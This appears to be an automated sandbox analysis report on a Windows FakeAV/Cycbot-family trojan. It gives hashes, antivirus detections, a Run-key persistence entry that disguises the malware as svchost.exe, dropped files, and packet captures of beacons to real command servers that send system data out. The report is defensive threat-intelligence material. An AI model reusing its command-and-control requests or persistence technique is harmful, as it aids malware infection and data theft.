Analysis Date2014-12-03 01:53:42
MD513a6612993eaf50ccdfb7b91ff94dca5
SHA12def034baf6e8890f3d6a8f4aa384706a9bc3cd5

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0630e9bfd501a822f5af451dfe182bef sha1: 2cd1e4c14dff59bd4acf1586398e8c00388f1698 size: 75776
Section.rdata md5: f70ce95bdf27c4827ea0fb973aa8c018 sha1: c040030d987e9eeb64650d6a2556b3abf523ec8a size: 3072
Section.data md5: 4b50006876c14389cb1889f966e81738 sha1: 5331983cd4270e3b2444040d16136e9096a8b3c3 size: 23040
Section.rsrc md5: 7ec53830eae4252fb8f11e96bbe32aaa sha1: 361e1f688f126b310d3e8d69271ca293fe9ecc20 size: 1024
Timestamp2005-09-05 15:31:45
VersionPrivateBuild: 1147
FileDescription: Windows Host Process
PEhash6ac6b5190dea60dce00d1df6214dbe16b5181a1a
IMPhash8abc07be48f6a4adc99cacc7419273cf
AV360 SafeGen:Variant.Kazy.2921
AVAd-AwareGen:Variant.Kazy.2921
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)Packed.Krap.hy
AVAuthentiumW32/Goolbot.B.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Variant.Kazy.2921
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Agent-215589
AVDr. WebTrojan.DownLoader1.35728
AVEmsisoftGen:Variant.Kazy.2921
AVEset (nod32)Win32/Kryptik.JAD
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.B.gen!Eldorado
AVF-SecureGen:Variant.Kazy.2921
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan.Win32.FakeAV
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.d
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.2921
AVNormanGen:Variant.Kazy.2921
AVRising0x55af3b03
AVSophosTroj/FakeDpr-A
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYCBOT.SME
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.google.com
Winsock DNSwww.pcdocpro.com
Winsock DNS127.0.0.1
Winsock DNSblogsmonitoringservice.com
Winsock DNSfindeffectivecasino.com
Winsock DNSbigtelevideochanel.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNSpcdocpro.com
Type: A
209.59.161.20
DNSwww.google.com
Type: A
74.125.227.179
DNSwww.google.com
Type: A
74.125.227.180
DNSwww.google.com
Type: A
74.125.227.176
DNSwww.google.com
Type: A
74.125.227.177
DNSwww.google.com
Type: A
74.125.227.178
DNSprotectyourpc-11.com
Type: A
74.200.250.181
DNSwww.pcdocpro.com
Type: A
DNSbigtelevideochanel.com
Type: A
DNSblogsmonitoringservice.com
Type: A
DNSfindeffectivecasino.com
Type: A
HTTP GEThttp://www.pcdocpro.com/images/logo-1.jpg?tq=gP4aKyd71obJgsE4W8%2BGzRzK80Yz6R4xoNzyPZGQwHNJidGv8pXg1TT5K55Hg29%2BrELuOFKyEcdr%2BBwtOVx3DycpWH8xEjvH9Ppa9h7K5OVX8AKZSoUylWYCmHrZu%2BUylWUekWj%2BWG91kBddRMJ5imOrDgNomv2otAUiKLK3lrcu9twgTnW0ELHO17qEzfdSb2xO4p2esm6oRrMKfhGLRsKSDALWf2PW4f0K2YxZ0efMmk4D%2FjenSyff3W3HwbWeMkk%2BM%2FDSF8UDFA8z5VouOEOdXm29v36QfsKTCGyvmogz2mgCWerJPLg0sXRikxBW4gsvfXIahJLGB%2BtYenvhbucN%2BSPdWy1XhnU7sXN68HejtxqeZX9c7WLOV%2B4VOhd6gqKgxxH2AMgxDng6PXck3rzg4EV0VnCp%2BRUE2LA419ZaLHVVHOUfXUeswMthxsrLDD8RDN%2FnjFRFN6TYKlu3j6UYG9IEqXgI2pKufgNrRKRaRoipgExTiEbO%2FAuFKRqIhqECUsxsJ0gBe3IyRSladb90m8oMXBPzKv03oYzSRsHi%2BSPZl3S2cmC0Ca9BbQZx6gh0kMbGyaNl3f%2FIjdBOnOw1aB2MclQr5kUhQyyu0l6ySHemUp6KG7Re3aZVjp7HOjUmzv%2Fze1WyXx2bAGDSAUsZhMxF
User-Agent: gbot/2.3
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err094_43_11001_0_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err073_2_2&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v43&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_5&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 209.59.161.20:80
Flows TCP192.168.1.1:1032 ➝ 74.125.227.179:80
Flows TCP192.168.1.1:1033 ➝ 74.125.227.179:80
Flows TCP192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1038 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1039 ➝ 74.200.250.181:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 6c6f676f   GET /images/logo
0x00000010 (00016)   2d312e6a 70673f74 713d6750 34614b79   -1.jpg?tq=gP4aKy
0x00000020 (00032)   6437316f 624a6773 45345738 25324247   d71obJgsE4W8%2BG
0x00000030 (00048)   7a527a4b 3830597a 36523478 6f4e7a79   zRzK80Yz6R4xoNzy
0x00000040 (00064)   505a4751 77484e4a 69644776 38705867   PZGQwHNJidGv8pXg
0x00000050 (00080)   31545435 4b353548 67323925 32427245   1TT5K55Hg29%2BrE
0x00000060 (00096)   4c754f46 4b794563 64722532 42427774   LuOFKyEcdr%2BBwt
0x00000070 (00112)   4f567833 44796370 57483878 456a7648   OVx3DycpWH8xEjvH
0x00000080 (00128)   39507061 3968374b 354f5658 38414b5a   9Ppa9h7K5OVX8AKZ
0x00000090 (00144)   536f5579 6c575943 6d48725a 75253242   SoUylWYCmHrZu%2B
0x000000a0 (00160)   55796c57 55656b57 6a253242 57473931   UylWUekWj%2BWG91
0x000000b0 (00176)   6b426464 524d4a35 696d4f72 44674e6f   kBddRMJ5imOrDgNo
0x000000c0 (00192)   6d76326f 74415569 4b4c4b33 6c726375   mv2otAUiKLK3lrcu
0x000000d0 (00208)   39747767 546e5730 454c484f 31377145   9twgTnW0ELHO17qE
0x000000e0 (00224)   7a666453 6232784f 34703265 736d366f   zfdSb2xO4p2esm6o
0x000000f0 (00240)   52724d4b 6668474c 52734b53 44414c57   RrMKfhGLRsKSDALW
0x00000100 (00256)   66325057 3466304b 3259785a 3065664d   f2PW4f0K2YxZ0efM
0x00000110 (00272)   6d6b3444 2532466a 656e5379 66663357   mk4D%2FjenSyff3W
0x00000120 (00288)   33487762 57654d6b 6b253242 4d253246   3HwbWeMkk%2BM%2F
0x00000130 (00304)   44534638 55444641 387a3556 6f754f45   DSF8UDFA8z5VouOE
0x00000140 (00320)   4f64586d 32397633 36516673 4b544347   OdXm29v36QfsKTCG
0x00000150 (00336)   79766d6f 677a326d 67435765 724a504c   yvmogz2mgCWerJPL
0x00000160 (00352)   67307358 52696b78 42573467 73766658   g0sXRikxBW4gsvfX
0x00000170 (00368)   4961684a 4c474225 32427459 656e7668   IahJLGB%2BtYenvh
0x00000180 (00384)   6275634e 25324253 50645779 3158686e   bucN%2BSPdWy1Xhn
0x00000190 (00400)   55377358 4e363848 656a7478 71655a58   U7sXN68HejtxqeZX
0x000001a0 (00416)   39633757 4c4f5625 32423456 4f686436   9c7WLOV%2B4VOhd6
0x000001b0 (00432)   67714b67 78784832 414d6778 446e6736   gqKgxxH2AMgxDng6
0x000001c0 (00448)   5058636b 33727a67 34455630 566e4370   PXck3rzg4EV0VnCp
0x000001d0 (00464)   25324252 5545324c 41343139 5a614c48   %2BRUE2LA419ZaLH
0x000001e0 (00480)   5656484f 55665855 6573774d 74687873   VVHOUfXUeswMthxs
0x000001f0 (00496)   724c4444 3852444e 2532466e 6a465246   rLDD8RDN%2FnjFRF
0x00000200 (00512)   4e365459 4b6c7533 6a365559 47394945   N6TYKlu3j6UYG9IE
0x00000210 (00528)   71586749 32704b75 66674e72 524b5261   qXgI2pKufgNrRKRa
0x00000220 (00544)   526f6970 67457854 6945624f 25324641   RoipgExTiEbO%2FA
0x00000230 (00560)   75464b52 71496871 45435573 78734a30   uFKRqIhqECUsxsJ0
0x00000240 (00576)   67426533 49795253 6c616462 39306d38   gBe3IyRSladb90m8
0x00000250 (00592)   6f4d5842 507a4b76 30336f59 7a535273   oMXBPzKv03oYzSRs
0x00000260 (00608)   48692532 4253505a 6c335332 636d4330   Hi%2BSPZl3S2cmC0
0x00000270 (00624)   43613942 62515a78 36676830 6b4d6247   Ca9BbQZx6gh0kMbG
0x00000280 (00640)   79614e6c 33662532 46496a64 424f6e4f   yaNl3f%2FIjdBOnO
0x00000290 (00656)   77316142 324d636c 5172356b 55685179   w1aB2MclQr5kUhQy
0x000002a0 (00672)   7975306c 36795348 656d5570 364b4737   yu0l6ySHemUp6KG7
0x000002b0 (00688)   52653361 5a566a70 37484f6a 556d7a76   Re3aZVjp7HOjUmzv
0x000002c0 (00704)   2532467a 65315779 58783262 41474453   %2Fze1WyXx2bAGDS
0x000002d0 (00720)   4155735a 684d7846 20485454 502f312e   AUsZhMxF HTTP/1.
0x000002e0 (00736)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x000002f0 (00752)   6c6f7365 0d0a486f 73743a20 7777772e   lose..Host: www.
0x00000300 (00768)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000310 (00784)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000320 (00800)   4167656e 743a2067 626f742f 322e330d   Agent: gbot/2.3.
0x00000330 (00816)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 614b790a             */*....aKy.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 345f3433   status=err094_43
0x00000070 (00112)   5f313130 30315f30 5f30266e 3d302665   _11001_0_0&n=0&e
0x00000080 (00128)   78747261 3d302048 5454502f 312e310d   xtra=0 HTTP/1.1.
0x00000090 (00144)   0a486f73 743a2070 726f7465 6374796f   .Host: protectyo
0x000000a0 (00160)   75727063 2d31312e 636f6d0d 0a557365   urpc-11.com..Use
0x000000b0 (00176)   722d4167 656e743a 204d6f7a 696c6c61   r-Agent: Mozilla
0x000000c0 (00192)   2f342e30 2028636f 6d706174 69626c65   /4.0 (compatible
0x000000d0 (00208)   3b204d53 49452036 2e303b20 57696e64   ; MSIE 6.0; Wind
0x000000e0 (00224)   6f777320 4e542035 2e31290d 0a436f6e   ows NT 5.1)..Con
0x000000f0 (00240)   74656e74 2d4c656e 6774683a 20300d0a   tent-Length: 0..
0x00000100 (00256)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000110 (00272)   650d0a0d 0a                           e....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a7469 6f6e3a20 636c6f73   se....tion: clos
0x00000110 (00272)   650d0a0d 0a                           e....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 385f325f   status=err088_2_
0x00000070 (00112)   30266e3d 30266578 7472613d 30204854   0&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 636c6f73   n: close....clos
0x00000110 (00272)   650d0a0d 0a                           e....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723037 335f325f   status=err073_2_
0x00000070 (00112)   32266e3d 30266578 7472613d 30204854   2&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a48 656a7478 71655a58   /html>.HejtxqeZX
0x000001a0 (00416)   39633757 4c4f5625 32423456 4f686436   9c7WLOV%2B4VOhd6
0x000001b0 (00432)   67714b67 78784832 414d6778 446e6736   gqKgxxH2AMgxDng6
0x000001c0 (00448)   5058636b 33727a67 34455630 566e4370   PXck3rzg4EV0VnCp
0x000001d0 (00464)   25324252 5545324c 41343139 5a614c48   %2BRUE2LA419ZaLH
0x000001e0 (00480)   5656484f 55665855 6573774d 74687873   VVHOUfXUeswMthxs
0x000001f0 (00496)   724c4444 3852444e 2532466e 6a465246   rLDD8RDN%2FnjFRF
0x00000200 (00512)   4e365459 4b6c7533 6a365559 47394945   N6TYKlu3j6UYG9IE
0x00000210 (00528)   71586749 32704b75 66674e72 524b5261   qXgI2pKufgNrRKRa
0x00000220 (00544)   526f6970 67457854 6945624f 25324641   RoipgExTiEbO%2FA
0x00000230 (00560)   75464b52 71496871 45435573 78734a30   uFKRqIhqECUsxsJ0
0x00000240 (00576)   67426533 49795253 6c616462 39306d38   gBe3IyRSladb90m8
0x00000250 (00592)   6f4d5842 507a4b76 30336f59 7a535273   oMXBPzKv03oYzSRs
0x00000260 (00608)   48692532 4253505a 6c335332 636d4330   Hi%2BSPZl3S2cmC0
0x00000270 (00624)   43613942 62515a78 36676830 6b4d6247   Ca9BbQZx6gh0kMbG
0x00000280 (00640)   79614e6c 33662532 46496a64 424f6e4f   yaNl3f%2FIjdBOnO
0x00000290 (00656)   77316142 324d636c 5172356b 55685179   w1aB2MclQr5kUhQy
0x000002a0 (00672)   7975306c 36795348 656d5570 364b4737   yu0l6ySHemUp6KG7
0x000002b0 (00688)   52653361 5a566a70 37484f6a 556d7a76   Re3aZVjp7HOjUmzv
0x000002c0 (00704)   2532467a 65315779 58783262 41474453   %2Fze1WyXx2bAGDS
0x000002d0 (00720)   4155735a 684d7846 20485454 502f312e   AUsZhMxF HTTP/1.
0x000002e0 (00736)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x000002f0 (00752)   6c6f7365 0d0a486f 73743a20 7777772e   lose..Host: www.
0x00000300 (00768)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000310 (00784)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000320 (00800)   4167656e 743a2067 626f742f 322e330d   Agent: gbot/2.3.
0x00000330 (00816)   0a0d0a                                ...

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a 20746869 73207365   lose.... this se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 33267379 7374656d   ype=g_v43&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   35266e3d 30266578 7472613d 30204854   5&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a48 656a7478 71655a58   /html>.HejtxqeZX
0x000001a0 (00416)   39633757 4c4f5625 32423456 4f686436   9c7WLOV%2B4VOhd6
0x000001b0 (00432)   67714b67 78784832 414d6778 446e6736   gqKgxxH2AMgxDng6
0x000001c0 (00448)   5058636b 33727a67 34455630 566e4370   PXck3rzg4EV0VnCp
0x000001d0 (00464)   25324252 5545324c 41343139 5a614c48   %2BRUE2LA419ZaLH
0x000001e0 (00480)   5656484f 55665855 6573774d 74687873   VVHOUfXUeswMthxs
0x000001f0 (00496)   724c4444 3852444e 2532466e 6a465246   rLDD8RDN%2FnjFRF
0x00000200 (00512)   4e365459 4b6c7533 6a365559 47394945   N6TYKlu3j6UYG9IE
0x00000210 (00528)   71586749 32704b75 66674e72 524b5261   qXgI2pKufgNrRKRa
0x00000220 (00544)   526f6970 67457854 6945624f 25324641   RoipgExTiEbO%2FA
0x00000230 (00560)   75464b52 71496871 45435573 78734a30   uFKRqIhqECUsxsJ0
0x00000240 (00576)   67426533 49795253 6c616462 39306d38   gBe3IyRSladb90m8
0x00000250 (00592)   6f4d5842 507a4b76 30336f59 7a535273   oMXBPzKv03oYzSRs
0x00000260 (00608)   48692532 4253505a 6c335332 636d4330   Hi%2BSPZl3S2cmC0
0x00000270 (00624)   43613942 62515a78 36676830 6b4d6247   Ca9BbQZx6gh0kMbG
